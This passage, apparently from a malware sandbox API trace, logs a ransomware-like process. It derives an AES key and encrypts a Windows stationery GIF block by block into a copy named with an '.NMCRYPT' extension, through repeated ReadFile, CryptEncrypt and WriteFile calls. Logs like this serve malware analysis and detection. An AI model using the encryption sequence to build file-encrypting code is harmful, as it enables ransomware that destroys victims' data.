pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.407] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0166.407] CryptHashData (hHash=0x9ad178, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.407] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad2f8) returned 1 [0166.407] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.407] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.407] wcslen (_String="\\\\?\\") returned 0x4 [0166.407] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad1b8) returned 1 [0166.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.408] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=15063) returned 1 [0166.408] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.409] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.410] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.410] GetLastError () returned 0x0 [0166.410] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.411] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.411] GetLastError () returned 0x0 [0166.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.411] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.411] GetLastError () returned 0x0 [0166.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.411] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.411] GetLastError () returned 0x0 [0166.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.411] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.411] GetLastError () returned 0x0 [0166.411] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.411] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.412] GetLastError () returned 0x0 [0166.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.412] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.413] GetLastError () returned 0x0 [0166.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.414] GetLastError () returned 0x0 [0166.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.415] CryptEncrypt (in: hKey=0x9ad1b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.415] GetLastError () returned 0x0 [0166.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.416] 